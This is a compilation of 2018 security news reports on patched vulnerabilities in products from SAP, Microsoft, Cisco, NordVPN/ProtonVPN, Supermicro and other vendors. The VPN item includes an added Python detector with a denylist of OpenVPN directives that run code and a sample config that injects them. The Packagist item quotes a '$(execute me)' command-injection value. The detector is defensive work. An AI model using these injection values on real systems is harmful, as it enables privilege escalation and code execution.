“Successful exploitation of these vulnerabilities could allow for remote code execution on the device, causing a denial of service condition or information exposure.” reads the advisory published by the ICS CERT.

The list of vulnerabilities includes use-after-free, untrusted pointer dereference, heap-based buffer overflow, out-of-bounds write, integer underflow, out-of-bounds read, and stack-based buffer overflow vulnerabilities that could be exploited by remote attackers to execute arbitrary code, trigger a denial-of-service (DoS) condition, or disclose information.

The bad news is that public exploits for some flaws are already available online.

The ICS-CERT also warns of another high severity buffer overflow in V-Server Lite that can lead to a DoS condition or information leakage. The flaw could be triggered by tricking victims into opening specially crafted project files.

The vendor addressed the issues with the release of version 4.0.4.0.

The flaws were reported to the vendor via Trend Micro’s Zero Day Initiative (ZDI) by researchers Steven Seeley from Source Incite and Ariele Caltabiano.

ZDI rated the flaws as “medium severity” with a CVSS score of 6.8, while the most severe issue was the one found by Caltabiano.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Fuji Electric V-Server. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” states the advisory from ZDI.

“The specific flaw exists within the parsing of a VPR file. The issue results from the lack of proper validation of user-supplied data, which can result in an integer underflow before writing to memory. An attacker can leverage this vulnerability to execute code under the context of the V-Server process.”


September 2018 Security Notes address a total of 14 flaws in SAP products
13.9.2018 securityaffairs
Vulnerebility

SAP today released the September 2018 set of Security Notes, which address a total of 14 flaws in its products, including a critical flaw in SAP Business Client.
The September 2018 Security Patch Day includes 13 other Security Notes: three were rated High severity, 9 Medium risk, and 1 Low severity. SAP also released 8 Support Package Notes.

The critical vulnerability in SAP Business Client addressed by SAP was rated as Hot News and received a CVSS score of 9.8. The issue affects the Chromium browser control delivered with SAP Business Client. The vulnerability was first addressed by the company on the April 2018 Patch Day, but the Security Note has been updated with the latest security updates.

Other SAP products addressed with the Security Notes are Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori “People Profile” (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

“SAP has released the monthly critical patch update for September 2018. This patch update closes 22 SAP Security Notes (14 SAP Security Patch Day Notes and 8 Support Package Notes). 3 of all the patches are updates to the previously released Security Notes.” reads a blog post published by security firm ERPScan.

“4 notes are released after the second Tuesday of the previous month and before the second Tuesday of this month.”


Most of the vulnerabilities are Missing Authorization Check, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues.

The most severe flaws in SAP Security Notes are:

2670284: SAP Business One and SAP HANA Installer has an Information Disclosure vulnerability (CVSS Base Score: 8.8 CVE-2018-2458).
2644279: SAP BEx Web Java Runtime Export Web Service has a Missing XML Validation (XXE) vulnerability (CVSS Base Score: 8.8 CVE-2018-2462).
2681207: DOS vulnerability in SAP HANA, Extended Application Services classic model
Product – SAP HANA; Versions – 1.0, 2.0 (CVE-2018-2465)
The flaw covered by Note 2681207 was discovered by Martin Doyhenard, a researcher at Onapsis.

“The attack can be carried out by an attacker by sending a large crafted request to a default API or ODATA services present in a HANA XS system abusing the XML parsing failure of one of the libraries which are used by xsengine to parse XML data strings. The malicious request can be remote and unauthenticated, that is, it does not need to be local or come from an authenticated user and no user credentials are needed.” reads the analysis published by Onapsis.


Address Bar Spoofing Flaw Found in Edge, Safari
12.9.2018 securityweek
Vulnerebility

A researcher has discovered an address bar spoofing vulnerability in the Microsoft Edge and Apple Safari web browsers, but a patch is currently only available for the former.

Pakistan-based security researcher Rafay Baloch has identified several SOP bypass and address bar spoofing flaws in past years. This week, he reported finding another spoofing bug that affects Safari on iOS and Edge.

“During my testing, it was observed that both Edge and Safari browsers allowed JavaScript to update the address bar while the page was still loading,” Baloch explained in a blog post. “Upon requesting data from a non-existent port the address was preserved and hence due to a race condition over a resource requested from a non-existent port combined with the delay induced by setInterval function managed to trigger address bar spoofing. It causes the browser to preserve the address bar and to load the content from the spoofed page. The browser will eventually load the resource, however the delay induced with the setInterval function would be enough to trigger the address bar spoofing.”

Both Microsoft and Apple were notified about the vulnerability in early June. Microsoft, which tracks the flaw as CVE-2018-8383, fixed the issue with its Patch Tuesday updates for August 2018.

“A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content. An attacker who successfully exploited this vulnerability could trick a user by redirecting the user to a specially crafted website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services,” Microsoft said in its advisory.

Microsoft has classified the flaw as “important,” but assigned it an “Exploitation More Likely” rating in its exploitability assessment. The company has credited Baloch and several others for reporting this flaw.

In the case of Safari for iOS, Baloch said the browser does not allow users to type information into input boxes while the page is still loading – this would normally prevent the spoofing attack – but the restriction can be bypassed by injecting a keyboard into the fake page.

Apple has yet to release a patch. The company was given 90 days to address the issue before its existence was made public, but it did promise to include a fix in an upcoming update of the browser.

The researcher has published videos showing how the attack works against each browser. Proof-of-concept (PoC) code has also been made available for Microsoft Edge.

 


Zerodium Discloses Flaw That Allows Code Execution in Tor Browser
12.9.2018 securityweek
Vulnerebility

Exploit acquisition firm Zerodium has disclosed a NoScript vulnerability that can be exploited to execute arbitrary JavaScript code in the Tor Browser even if the maximum security level is used.

Zerodium disclosed the flaw and provided instructions on how it can be reproduced in a single message posted to Twitter on Monday. The recently released Tor Browser 8 is not affected.

While the tweet describes the issue as a vulnerability or backdoor in the Tor Browser, the flaw actually impacts NoScript, a popular Firefox extension designed to protect users against malicious scripts by allowing JavaScript, Java, and Flash plugins to be executed only on trusted websites. The Tor Browser is based on Firefox and it includes NoScript by default.

Zerodium discloses Tor Browser zero-day exploit

Giorgio Maone, the Italian developer who created NoScript, patched the vulnerability in roughly two hours with the release of version 5.1.8.7. Maone noted that only the “Classic” branch of NoScript 5 is impacted.

The developer explained that the bug exists due to a “work-around for NoScript blocking the in-browser JSON viewer.” He also noted that the vulnerability was introduced in May 2017 with the release of NoScript 5.0.4.

Contacted by SecurityWeek, Tor Project representatives highlighted that this is not a Tor Browser zero-day vulnerability.

“This was a bug in NoScript and not a zero-day exploit of Tor Browser that could circumvent its privacy protections. For bypassing Tor, a real browser exploit would still be needed,” the Tor Project explained.

Chaouki Bekrar, the CEO of Zerodium, told SecurityWeek that the exploit basically circumvents the protection provided by NoScript, even if the Tor Browser is set to the “Safest” security level.

“If a user sets his Tor browser security level to ‘Safest’ to block JavaScript from all websites (e.g. to prevent browser exploits or data gathering), the exploit would allow a website or a hidden service to bypass all NoScript restrictions and execute any JavaScript code despite the maximum security level being used, making it totally ineffective,” Bekrar explained.

Bekrar said his company acquired the vulnerability as a zero-day “many months ago” and shared it with its government customers. He claims Zerodium has acquired – including as part of a time-limited $1 million bug bounty program – what he describes as “high-end Tor exploits.” The company’s customers have allegedly used these exploits to “fight crime and child abuse, and make the world a better and safer place for all.”

Asked if he is concerned that the vulnerability may be exploited for malicious purposes now that it has been disclosed by Zerodium, Bekrar highlighted that version 8 of Tor Browser is not impacted and that it’s highly recommended that users upgrade to the newest release.


SAP Patches Critical Vulnerability in Business Client
12.9.2018 securityweek
Vulnerebility

SAP today released its September 2018 set of patches to address a total of 14 vulnerabilities in its products, including a critical bug in SAP Business Client.

Featuring a CVSS score of 9.8 and rated Hot News, the vulnerability impacts the Chromium browser control delivered with SAP Business Client. The issue was initially addressed on the April 2018 Patch Day, but SAP decided to update the Security Note today.

Of the remaining 13 Security Notes included in this month’s Security Patch Day, three were rated High severity, nine Medium risk, and one Low severity.

Impacted SAP products include Business One, BEx Web Java Runtime Export Web Service, HANA, WebDynpro, NetWeaver AS Java, Hybris Commerce, Plant Connectivity, Adaptive Server Enterprise, HCM Fiori "People Profile" (GBX01HR), Mobile Platform, Enterprise Financial Services, and Business One Android application.

SAP also released 8 Support Package Notes this month, for a total of 22 Security Notes, reveals ERPScan, a company that specializes in securing Oracle and SAP products. Four of the notes were released over the course of the last month.

Missing Authorization Check was the most encountered type of vulnerability, followed by information disclosure, Cross-Site Scripting, and XML External Entity issues. SAP also addressed implementation flaws, denial of service, SQL injection, buffer overflow, and server side request forgery vulnerabilities.

The most important bugs closed in September (all featuring a CVSS Base Score of 8.8) include a Missing Authorization check vulnerability in SAP ECC Sales Support, an Information Disclosure vulnerability in Business One and HANA Installer, and a Missing XML Validation (XXE) vulnerability in BEx Web Java Runtime Export Web Service.

Another important bug was a denial of service vulnerability in SAP HANA, Extended Application Services Classic Model. Tracked as CVE-2018-2465, the flaw has a CVSS score of 7.5 and is considered High risk.

Discovered by Onapsis researchers, the flaw can be exploited by a remote, unauthenticated attacker through a large crafted request to a default API or to ODATA services present in a HANA XS system, abusing the XML parsing, the company says.

“Even though a Denial Of Service attack is the easiest way to exploit this vulnerability, a more complex attack could lead to a potential remote code execution (RCE), that could lead to even worse scenarios for the affected users,” Sebastian Bortnik, Director Of Research for Onapsis, told SecurityWeek in an emailed comment.

A Cross-Site Scripting issue in NetWeaver AS Java Logon Application (versions 7.10, 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50) can lead to defacements, user credential compromise, or user impersonation, explains Onapsis, which also focuses on securing Oracle and SAP applications.


Microsoft Patches Windows Zero-Day Disclosed via Twitter
12.9.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for September 2018 address over 60 vulnerabilities, including a zero-day disclosed by a researcher and exploited shortly after by a threat actor.

The actively exploited flaw, identified as CVE-2018-8440, was disclosed on August 27 by a researcher who uses the online moniker SandboxEscaper. The security hole was not reported to Microsoft before its existence was disclosed via Twitter as SandboxEscaper was apparently frustrated with the company’s vulnerability reporting process.

The privilege escalation vulnerability, which according to Microsoft exists when Windows improperly handles calls to the Advanced Local Procedure Call (ALPC) interface of the Task Scheduler, can be exploited by an authenticated attacker to execute code with elevated privileges.

ESET discovered that a newly uncovered group it tracks as PowerPool used a modified version of the public exploit in an attempt to deliver malware to a small number of users located in the United States, the United Kingdom, Germany, Ukraine, Chile, India, Russia, the Philippines and Poland.

Three other vulnerabilities patched by Microsoft on Tuesday were made public before fixes were released, but none of them have been exploited in the wild.

One of them, tracked as CVE-2018-8475 and rated critical, allows an attacker to execute arbitrary code by getting the targeted Windows user to execute a specially crafted image file.

“Microsoft provides no information on where this is public, but given the severity of the issue and the relative ease of exploitation, expect this one to find its way into exploit kits quickly,” Trend Micro’s Zero Day Initiative (ZDI) explained in a blog post discussing Patch Tuesday updates.

Another publicly disclosed critical flaw is CVE-2018-8457, which affects Microsoft’s web browsers and which can be exploited to execute arbitrary code by getting the target to access a malicious website.

The last publicly disclosed flaw is an “important” denial-of-service (DoS) issue affecting .NET Core, ASP.NET Core and the System.IO.Pipelines component.

A total of 17 vulnerabilities have been rated “critical” by Microsoft, including ones affecting Windows, web browsers, and the .NET framework.

Two interesting flaws are CVE-2018-0965 and CVE-2018-8439. They both affect Windows Hyper-V and they both allow an attacker with access to a guest virtual machine to execute code on the host operating system.

Adobe and SAP have also released Patch Tuesday updates. Adobe fixed 10 vulnerabilities in Flash Player and ColdFusion, while SAP addressed a total of 14 flaws across several of its products.


Adobe Patch Tuesday for September 2018 fixes 10 flaws in Flash Player and ColdFusion
12.9.2018 securityaffairs
Vulnerebility

Adobe Patch Tuesday updates for September 2018 address a total of 10 vulnerabilities in Flash Player and ColdFusion; the good news is that none is severe.
The Adobe Patch Tuesday updates for September 2018 addressed an important privilege escalation vulnerability (CVE-2018-15967) in Adobe Flash Player 30.0.0.154 and earlier versions. Successful exploitation of the flaw could lead to information disclosure.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address an important vulnerability in Adobe Flash Player 30.0.0.154 and earlier versions. Successful exploitation could lead to information disclosure.” reads the security advisory published by Adobe.

Version 31.0.0.108 addresses the CVE-2018-15967 flaw. The issue was rated “important” with a priority rating of 2, which indicates that the likelihood of it being exploited in attacks in the wild is very low.

The remaining nine vulnerabilities affect Adobe ColdFusion, six of which are rated critical (four deserialization of untrusted data issues, one unrestricted file upload, and one issue related to the use of a component with a known vulnerability).

The security flaws impact ColdFusion 11, 2016 and 2018, and Adobe has issued update instructions for each version.

The critical flaws could be exploited for arbitrary code execution and arbitrary file overwrite, while the unrestricted file upload bug can lead to code execution.

Two other flaws in ColdFusion have been rated “important”; an attacker could exploit them to create arbitrary folders and to obtain directory listings.

Adobe ColdFusion is also affected by a moderate severity information disclosure vulnerability that was introduced by the use of a component with a known flaw.


Trend Micro Apps removed from Mac App Store after being caught exfiltrating user data
11.9.2018 securityaffairs
Vulnerebility

Several anti-malware apps developed by Trend Micro have been removed from the Mac App Store because they were harvesting users’ browser history and other info.
Several anti-malware apps developed by Trend Micro, including Dr Cleaner, Dr. Unarchiver, Dr Antivirus, and App Uninstall, have been removed from the Mac App Store after researchers discovered they were harvesting users’ browser history and other information.

At the time of writing, it is not clear if Trend Micro removed the apps itself following complaints or if Apple removed them due to their activities.

The security researcher who handles the Twitter account Privacy First first reported the alleged unethical behavior and published a video that shows how the app harvests users’ data.

Former NSA white hat hacker Patrick Wardle reported last week that Trend Micro apps were also collecting users’ personal data, including their browsing history, and then uploading that data in a password-protected archive to a server.

“Moreover, the network proxy monitor (Charles Proxy) captures a connection attempt from Adware Doctor to adscan.yelabapp.com:” “By editing the system’s /etc/hosts file we can redirect this request to a server we control and can capture what Adware Doctor is trying to upload. And what do you think that might be? If you guessed the history.zip file you would be correct!” wrote Wardle.


“The uploaded ‘history.zip’ archive is password protected:”

Wardle highlighted that the applications he analyzed were signed off by Trend Micro and approved by Apple.

“From a security and privacy point of view, one of the main benefits of installing applications from the official Mac App Store is that such applications are sandboxed,” Wardle added.

“The other benefit is that Apple supposedly vets all submitted applications – but as we’ve clearly shown here, they (sometimes?) do a miserable job.”

Trend Micro has admitted that browser histories were collected as part of the code’s installation. In a statement today, the biz said:

“Dr Cleaner, Dr Cleaner Pro, Dr Antivirus, Dr Unarchiver, Dr Battery, and Duplicate Finder collected and uploaded a small snapshot of the browser history on a one-time basis, covering the 24 hours prior to installation. This was a one-time data collection, done for security purposes (to analyze whether a user had recently encountered adware or other threats, and thus to improve the product & service).” reads the official reply published by the company.

“The data collected was explicitly identified to the customer in the data collection policy and is highlighted to the user during the install. The browser history data was uploaded to a US-based server hosted by AWS and managed/controlled by Trend Micro.”

Trend announced it is removing the suspicious feature from its application.

Just yesterday I reported that a group of security researchers behind the Guardian mobile firewall app revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data by asking users for permission to do it, but fail to inform users that the gathered information is shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”


VPN Firms Release New Patches for Privilege Escalation Flaw
10.9.2018 securityweek
Vulnerebility

Virtual private network (VPN) service providers ProtonVPN and NordVPN have made another attempt to patch a potentially serious privilege escalation vulnerability that they first tried to address a few months ago.

Fabius Watson of VerSprite Security discovered in March that the Windows versions of the ProtonVPN and NordVPN applications were affected by a vulnerability that could have been abused to execute arbitrary code with elevated privileges. The vendors released patches in April.

However, Cisco researchers discovered that the initial patch could be easily bypassed, triggering a new round of updates from ProtonVPN and NordVPN.

The flaw, initially tracked as CVE-2018-10169, allowed an attacker with low privileges to execute arbitrary code with elevated permissions by making changes to the OpenVPN configuration file. Specifically, an attacker could have added a parameter such as “plugin” or “script-security” to the configuration file and the file specified through these parameters would get executed by OpenVPN with admin privileges.

Both ProtonVPN and NordVPN attempted to resolve the issue by ensuring that the “plugin,” “script-security,” “up” or “down” strings could not be added to the configuration file – all of these parameters allow code or command execution through the VPN program.

However, Cisco researchers discovered that simply adding these parameters in quotation marks in the configuration file bypassed the patch. The company has published a simple proof-of-concept (PoC) exploit that shows how the vulnerability can be exploited to execute Notepad in Windows.

ProtonVPN and NordVPN have now released new fixes, which should be much more effective. They now prevent users with limited privileges from making any kinds of modifications to the configuration files.

The vulnerability is tracked as CVE-2018-3952 (NordVPN) and CVE-2018-4010 (ProtonVPN), and it has been classified as “high severity” for both applications. NordVPN released a patch on August 8, but ProtonVPN made the second fix available only in early September.

“The new patches developed by the editors are different. For ProtonVPN, they put the OpenVPN configuration file in the installation directory, and a standard user cannot modify it. Thus, we cannot add the malicious string in it. For NordVPN, the editor decided to use an XML model to generate an OpenVPN configuration file. A standard user cannot edit the template,” Cisco said in a blog post.
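The bypass described above comes down to where the directive check runs: a string comparison on the raw line sees the token `"plugin"` (with its quotes) and does not match the bare word `plugin`, while OpenVPN's own parser strips the quotes and treats the two as the same directive. The following is an added example, not code from the article, from ProtonVPN, NordVPN or Cisco Talos: it shows the weak raw-string denylist beside a quote-aware check and an allowlist policy, run over a constructed configuration. The tokenizer is an approximation of OpenVPN's line parsing (assumption), and the paths in the sample are placeholders.

```python
# Added example (not code from the article or the vendors): checking an
# OpenVPN-style configuration for directives that execute code.
DANGEROUS_DIRECTIVES = {"plugin", "script-security", "up", "down"}

# Constructed sample configuration in the shape the article describes:
# three legitimate lines followed by three code-executing directives,
# two of them wrapped in quotes. Paths are placeholders.
SAMPLE_CONFIG = """\
client
dev tun
remote vpn.example.invalid 1194
"plugin" /tmp/placeholder-plugin.so
'script-security' 2
up /tmp/placeholder-script.sh
"""


def naive_denylist_hits(config_text):
    """The weak check: compare the raw first whitespace-delimited word of each
    line against the denylist. A quoted directive name such as "plugin" does
    not match the bare string, so only the unquoted 'up' line is flagged."""
    hits = []
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        words = line.split()
        if words and words[0] in DANGEROUS_DIRECTIVES:
            hits.append(lineno)
    return hits


def tokenize_openvpn_line(line):
    """Approximation (assumption, not OpenVPN's own code) of how OpenVPN splits
    a config line: whitespace separates tokens, double or single quotes group
    a token, backslash escapes the next character, and the quote characters
    themselves are dropped."""
    tokens, current, quote, escaped, in_token = [], [], None, False, False
    for ch in line:
        if escaped:
            current.append(ch)
            escaped = False
            in_token = True
        elif ch == "\\":
            escaped = True
        elif quote is not None:
            if ch == quote:
                quote = None
            else:
                current.append(ch)
        elif ch in ('"', "'"):
            quote = ch
            in_token = True
        elif ch.isspace():
            if in_token:
                tokens.append("".join(current))
                current, in_token = [], False
        else:
            current.append(ch)
            in_token = True
    if in_token:
        tokens.append("".join(current))
    return tokens


def directives(config_text):
    """Yield (line number, directive name, arguments) for non-comment lines,
    using the quote-aware tokenizer so "plugin" and plugin look the same."""
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue  # OpenVPN treats lines starting with '#' or ';' as comments
        tokens = tokenize_openvpn_line(stripped)
        if tokens:
            yield lineno, tokens[0], tokens[1:]


def quote_aware_hits(config_text):
    """Denylist check applied after parsing: catches all three injected lines."""
    return [lineno for lineno, name, _ in directives(config_text)
            if name in DANGEROUS_DIRECTIVES]


def unexpected_directives(config_text, allowed):
    """Stronger policy: an allowlist of directives the client is known to need.
    Anything else is reported, so a new code-execution option never needs a
    denylist update to be caught."""
    return sorted({name for _, name, _ in directives(config_text)
                   if name not in allowed})


if __name__ == "__main__":
    print("naive denylist flags lines:", naive_denylist_hits(SAMPLE_CONFIG))
    print("quote-aware denylist flags lines:", quote_aware_hits(SAMPLE_CONFIG))
    print("outside allowlist:", unexpected_directives(SAMPLE_CONFIG, {"client", "dev", "remote"}))
```

Parsing the file the way the consumer parses it is a detection and defence-in-depth measure; the control the vendors eventually shipped, a configuration file that a standard user cannot write at all, removes the attack surface rather than filtering it, and the allowlist above is the form to prefer if filtering is still needed.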


Flaw in update process for BMCs in Supermicro servers allows attackers to deliver persistent malware or brick the server
7.9.2018 securityaffairs
Vulnerebility

A team of security researchers discovered a vulnerability in the baseboard management controller (BMC) hardware used by Supermicro servers.
Researchers from security firm Eclypsium have discovered a vulnerability in the firmware update mechanism that could be exploited by hackers to deliver persistent malware that survives a complete wipe and reinstall of the operating system.

“Using the vulnerabilities we discovered, it is possible to make arbitrary modifications to the BMC code and data. Using these modifications, an attacker can run malicious software within these highly privileged management controllers. This could be useful, for example, to survive operating system reinstallation or communicate covertly with the attacker’s infrastructure, similar to the PLATINUM malware that used manageability features to bypass detection.” reads the advisory published by the experts.

“Alternatively, this vulnerability could be used to “brick” (permanently disable) the BMC or the entire system, creating an impact even more severe than the BlackEnergy KillDisk component.”

Supermicro server BMCs

The Baseboard Management Controllers (BMCs) are part of the server motherboard and are used to directly control and manage the various hardware components of the system. It could be used to repair or reinstall the system software and it could be remotely controlled by administrators.

The BMCs are a privileged target for hackers because they operate at a low level, below the host OS and system firmware.

Experts discovered that the update mechanism neither implements code-signing verification nor checks whether the firmware was downloaded from a legitimate source.

The exploitation of the flaw could allow attackers to run malicious code that is transparent to OS-level antimalware solutions.

The attack scenario requires hackers to be in a position to carry out man-in-the-middle attacks, meaning they have to be able to access the traffic during the update process.

“Our research has uncovered vulnerabilities in the way that multiple vendors update their BMC firmware. These vendors typically leverage standard, off-the-shelf IPMI management tools instead of developing customized in-house management capabilities.” continues the analysis.

“In this case, we will go deep into the BMC update process on Supermicro systems, we found that the BMC code responsible for processing and applying firmware updates does not perform cryptographic signature verification on the provided firmware image before accepting the update and committing it to non-volatile storage. This effectively allows the attacker to load modified code onto the BMC.”

The researchers highlighted that attackers could exploit the flaw to permanently brick the BMC or the entire server.

“Because IPMI communications can be performed over the BMC LAN interface, this update mechanism could also be exploited remotely if the attacker has been able to capture the admin password for the BMC,” Eclypsium added.

“This requires access to the systems management network, which should be isolated and protected from the production network. However, the implicit trust of management networks and interfaces may generate a false sense of security, leading to otherwise-diligent administrators practicing password reuse for convenience.”

The researchers reported the flaw to Supermicro, which addressed it by adding signature verification to the firmware update tool.


Latest Version of Chrome Improves Password Management, Patches 40 Flaws
6.9.2018 securityweek
Vulnerebility

Google this week celebrates 10 years of its Chrome web browser with the release of a new version that provides users with security improvements, new features, and patches for 40 vulnerabilities.

The highly popular web browser now has an improved password manager that makes it easier for users to have a unique and strong password for each site. When a user is setting a new password, Chrome can generate it and save it, so that it is easily accessible on both computers and phones.

Chrome 69 also brings updated site indicators, as it no longer marks HTTPS websites with a green lock. Instead, the indicator is now grey, given that Google considers HTTPS connections the norm.

Starting with Chrome 68, Google is marking sites served over HTTP connections as “Not Secure”, in order to warn users that data transmitted between the site and the browser is susceptible to man-in-the-middle attacks and other types of threats. Attackers could even modify the content of web pages before they are delivered to the user.

Some of the new features in the browser include answers directly in the address bar (the Omnibox), improved site shortcut management, and new looks that include modified shape of tabs to make site icons easier to see.

Chrome Enterprise 69 now blocks third-party software to provide users with improved stability, requires users to grant explicit permission for Adobe Flash to run on sites still using it (the permission is asked after each browser restart), and prevents password reuse with a Password Alert policy.

Google also addressed a total of 40 security vulnerabilities with the release of Chrome 69, 22 of which were reported by external researchers. Of these, 7 were High risk flaws, 13 were Medium severity, and 2 were Low risk bugs.

Some of the addressed issues include out of bounds writes (in V8, Blink, WebAudio, Mojo, SwiftShader, Little-CMS, PDFium, and WebRTC), integer overflow in Skia, use after free (in WebRTC and Memory Instrumentation), Site Isolation bypasses, cross origin pixel leak, local file access, content security policy bypass, credit card information leak, URL spoofs, and stack buffer overflow in SwiftShader.

Google paid nearly $30,000 in bug bounty rewards to the reporting researchers, but the company hasn’t revealed information on all of the awarded bounties.

The latest browser iteration is now available for download for Windows, Mac and Linux as Chrome 69.0.3497.81.


Multiple Vulnerabilities Addressed in Opsview Monitor
6.9.2018 securityweek
Vulnerebility

Opsview recently addressed a series of remote code-execution, command-execution and local privilege-escalation vulnerabilities in the Opsview Monitor.

A proprietary monitoring application for networks and applications, Opsview Monitor “helps DevOps teams deliver smarter business services by providing unified insight into their dynamic IT operations whether on-premises, in the cloud, or hybrid,” the company says.

The software is impacted by five vulnerabilities that could provide attackers with the ability to access the management console and execute commands on the operating system.

Discovered by Core Security researchers earlier this year, the bugs were confirmed to impact all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition to patches (the 5.4.2 and 5.3.1 updates) for the affected versions, Opsview also released a new product iteration that removed the issues from the start.

A virtual appliance deployed inside the organization's network infrastructure, Opsview Monitor is bundled with a Web Management Console that allows for the monitoring and management of hosts and their services.

The first two issues found in the appliance could be abused to execute malicious JavaScript code in the context of a legitimate user. These are CVE-2018-16148, a reflected Cross-Site Scripting (XSS) in the 'diagnosticsb2ksy' parameter of the '/rest' endpoint, and CVE-2018-16147, a persistent XSS in the 'data' parameter of the '/settings/api/router' endpoint.

“The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. […] this XSS is self-stored and it's executed only in the context of the victim's session. [The] vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section,” Core Security explains.

Two other vulnerabilities could allow an attacker to obtain command execution on the system as the nagios user. Tracked as CVE-2018-16146 and CVE-2018-16144, both of these are improper sanitization bugs.

Tracked as CVE-2018-16145, the fifth vulnerability could lead to local privilege escalation. An attacker could edit a specific part of a script to execute code once the appliance is rebooted (at boot, scripts impersonate the nagios user during their execution).

The bugs were reported to Opsview in early May and were confirmed within a week. The company released Opsview Monitor 6.0 at the end of July and pushed fixes for the previous software iterations last week.


Cisco Patches Serious Flaws in RV, SD-WAN, Umbrella Products
6.9.2018 securityweek
Vulnerebility

Cisco informed customers on Wednesday that patches are available for over a dozen critical and high severity vulnerabilities affecting the company’s RV series, SD-WAN, Umbrella and other products.

Two of the flaws have been rated “critical” by Cisco. One of them, CVE-2018-0423, is a buffer overflow vulnerability in the web-based management interface of various RV series firewalls and routers. The security hole allows a remote and unauthenticated attacker to cause a denial-of-service (DoS) condition or to execute arbitrary code.

The second flaw assigned a “critical” rating by the networking giant is CVE-2018-0435 and it impacts the Cisco Umbrella API. A remote attacker could leverage the vulnerability to read or modify data across multiple organizations, but exploitation requires authentication. Cisco noted that the bug has been addressed in the API and no user interaction is required to apply the patch.

The critical vulnerability affecting RV series devices was reported to Cisco by Qingtang Zheng of the 360 ESG CodeSafe Team, who also discovered three additional high severity flaws in the management interface of these products.

Two of the flaws allow an attacker to remotely gain access to sensitive information and one can be exploited for arbitrary command execution, but the latter requires authentication.

The Umbrella solution is also affected by some high severity flaws. Specifically, the Umbrella Enterprise Roaming client has a couple of weaknesses that can be exploited by an authenticated attacker to elevate privileges to “Administrator.” These issues were discovered by a researcher from Critical Start, which has published its own blog post providing detailed technical information.

Cisco’s SD-WAN solution is also impacted by high severity vulnerabilities. They can allow hackers to gain access to sensitive data, execute commands as root, and elevate privileges, but some require either local access and/or authentication.

The company also informed customers that patches are available for serious privilege escalation and information disclosure bugs in WebEx, a DoS flaw in Prime Access Registrar, a privilege escalation in Data Center Network Manager, and two command injections in the Integrated Management Controller (IMC) software.

Cisco is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.


Cisco fixes 32 security vulnerabilities in its products, including three critical flaws
6.9.2018 securityaffairs
Vulnerebility

Cisco has released thirty security advisories to address a total of 32 security vulnerabilities in its products, including three critical flaws.
Cisco released thirty security advisories to address a total of 32 security vulnerabilities in its products.

The good news is that the tech giant is not aware of any exploitation of the addressed vulnerabilities in attacks in the wild.

Three flaws are rated as critical, one of them is the recently discovered CVE-2018-11776 Apache Struts remote code execution vulnerability.

The other critical issues addressed by Cisco are the Cisco Umbrella API Unauthorized Access Vulnerability (CVE-2018-0435) and the Cisco RV110W, RV130W, and RV215W Routers Management Interface Buffer Overflow Vulnerability (CVE-2018-0423).

The “critical” flaw CVE-2018-0435 affects the Cisco Umbrella API; a remote authenticated attacker could leverage the vulnerability to read or modify data across multiple organizations.

“A vulnerability in the Cisco Umbrella API could allow an authenticated, remote attacker to view and modify data across their organization and other organizations.” reads the security advisory.

“The vulnerability is due to insufficient authentication configurations for the API interface of Cisco Umbrella. An attacker could exploit this vulnerability to view and potentially modify data for their organization or other organizations. A successful exploit could allow the attacker to read or modify data across multiple organizations.”

The vulnerability has been addressed in the API itself, which means that no action is required from end users.

The Umbrella solution is also affected by other high severity vulnerabilities: two flaws affect the Umbrella Enterprise Roaming client, and an authenticated attacker can exploit them to elevate privileges to “Administrator.”

The second flaw addressed by Cisco is the CVE-2018-0423, a buffer overflow vulnerability that resides in the web-based management interface of several firewalls and routers belonging to the RV series. The flaw could be exploited by a remote and unauthenticated attacker to trigger a denial-of-service (DoS) condition or to execute arbitrary code.

“A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to cause a denial of service condition or to execute arbitrary code.” reads the security advisory.

“The vulnerability is due to improper boundary restrictions on user-supplied input in the Guest user feature of the web-based management interface. An attacker could exploit this vulnerability by sending malicious requests to a targeted device, triggering a buffer overflow condition. A successful exploit could allow the attacker to cause the device to stop responding, resulting in a denial of service condition, or could allow the attacker to execute arbitrary code.”

The flaw could be exploited by an attacker by sending malicious requests to a targeted device, triggering a buffer overflow condition.

Cisco issued security updates for serious privilege escalation and information disclosure flaws in WebEx, a DoS flaw in Prime Access Registrar, two command injections in the Integrated Management Controller (IMC) software, and a privilege escalation in Data Center Network Manager.


Critical remote code execution flaw patched in Packagist PHP package repository
4.9.2018 securityaffairs
Vulnerebility

Maintainers of Packagist, the largest PHP package repository, have recently addressed a critical remote code execution vulnerability.
Packagist is the default package host behind Composer; it has over 435 million package installs.

The vulnerability was reported by the security researcher Max Justicz, who discovered that the “Submit Package” input field for submitting new PHP packages via the package repository homepage allowed an attacker to execute a malicious command in the format of “$(execute me)”.

